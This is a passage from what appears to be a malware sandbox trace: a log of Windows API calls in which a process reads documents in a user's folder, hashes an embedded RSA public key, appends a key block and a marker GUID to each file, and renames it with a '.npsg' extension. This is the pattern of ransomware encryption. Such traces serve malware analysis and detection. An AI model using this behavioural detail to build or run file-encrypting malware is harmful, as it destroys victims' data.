lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0246.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa00 | out: hHeap=0x620000) returned 1 [0246.302] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.302] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.302] CloseHandle (hObject=0x644) returned 1 [0246.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf0) returned 0x33b8188 [0246.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8f0) returned 0x3b8ccd0 [0246.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.304] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\aptTohPKV__r.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\d0cspe54ns\\apttohpkv__r.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\aptTohPKV__r.xlsx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\d0cspe54ns\\apttohpkv__r.xlsx.npsg")) returned 1 [0246.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.305] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0246.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0246.306] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53816500, ftCreationTime.dwHighDateTime=0x1d5bb7e, ftLastAccessTime.dwLowDateTime=0xe1253400, ftLastAccessTime.dwHighDateTime=0x1d5bb05, ftLastWriteTime.dwLowDateTime=0xe1253400, ftLastWriteTime.dwHighDateTime=0x1d5bb05, nFileSizeHigh=0x0, nFileSizeLow=0x8957, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k047QpgNmppt.xls", cAlternateFileName="K047QP~1.XLS")) returned 1 [0246.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11e) returned 0x6affc0 [0246.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.306] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\k047QpgNmppt.xls") returned=".xls" [0246.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\k047QpgNmppt.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\d0cspe54ns\\k047qpgnmppt.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.309] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=35159) returned 1 [0246.309] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.311] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x8931, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.311] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0246.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.313] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.313] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x8957, lpOverlapped=0x0) returned 1 [0246.313] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0246.313] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.313] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.314] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.314] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.314] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.315] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0246.315] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.315] GetLastError () returned 0x0 [0246.315] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.315] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.315] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.315] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.315] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8960) returned 0x3b99d50 [0246.315] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0246.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0246.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0246.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0246.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0246.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8ff58 [0246.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89108 [0246.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8ffa0 [0246.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89120 [0246.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89150 [0246.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891b0 [0246.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89168 [0246.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0246.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0246.316] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0246.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa00 [0246.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89150 | out: hHeap=0x620000) returned 1 [0246.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89168 | out: hHeap=0x620000) returned 1 [0246.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891b0 | out: hHeap=0x620000) returned 1 [0246.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0246.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa00 | out: hHeap=0x620000) returned 1 [0246.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891b0 [0246.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0246.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89168 [0246.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0246.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b89150 [0246.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0246.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bc90 [0246.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0246.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0246.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0246.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8660 [0246.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0246.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bc90 | out: hHeap=0x620000) returned 1 [0246.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89168 | out: hHeap=0x620000) returned 1 [0246.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89150 | out: hHeap=0x620000) returned 1 [0246.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0246.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891b0 | out: hHeap=0x620000) returned 1 [0246.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0246.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0246.318] GetCurrentThreadId () returned 0x5b4 [0246.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0246.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8aca8 [0246.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0246.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0246.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0246.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0246.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0246.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.318] GetCurrentThreadId () returned 0x5b4 [0246.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x64dd08 [0246.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0246.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4ac0 [0246.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0246.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891b0 [0246.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0246.320] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x8957, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.320] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.320] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.320] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.320] CloseHandle (hObject=0x644) returned 1 [0246.322] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\k047QpgNmppt.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\d0cspe54ns\\k047qpgnmppt.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\k047QpgNmppt.xls.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\d0cspe54ns\\k047qpgnmppt.xls.npsg")) returned 1 [0246.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.323] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0246.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0246.324] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1018a390, ftCreationTime.dwHighDateTime=0x1d5b99a, ftLastAccessTime.dwLowDateTime=0xc4f61b20, ftLastAccessTime.dwHighDateTime=0x1d5c1a7, ftLastWriteTime.dwLowDateTime=0xc4f61b20, ftLastWriteTime.dwHighDateTime=0x1d5c1a7, nFileSizeHigh=0x0, nFileSizeLow=0x73f5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kqXbmw04O-KCrgMb.csv", cAlternateFileName="KQXBMW~1.CSV")) returned 1 [0246.324] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\kqXbmw04O-KCrgMb.csv") returned=".csv" [0246.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\kqXbmw04O-KCrgMb.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\d0cspe54ns\\kqxbmw04o-kcrgmb.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.325] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=29685) returned 1 [0246.325] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.328] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x73cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.328] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0246.332] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x73f5, lpOverlapped=0x0) returned 1 [0246.333] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.333] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.333] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.333] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.334] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.334] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.334] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.334] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.334] GetLastError () returned 0x0 [0246.334] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.334] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.334] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.334] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.334] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.335] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0246.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa00 [0246.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89168 | out: hHeap=0x620000) returned 1 [0246.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89180 | out: hHeap=0x620000) returned 1 [0246.335] HeapFree (in: hHeap=0x620000, 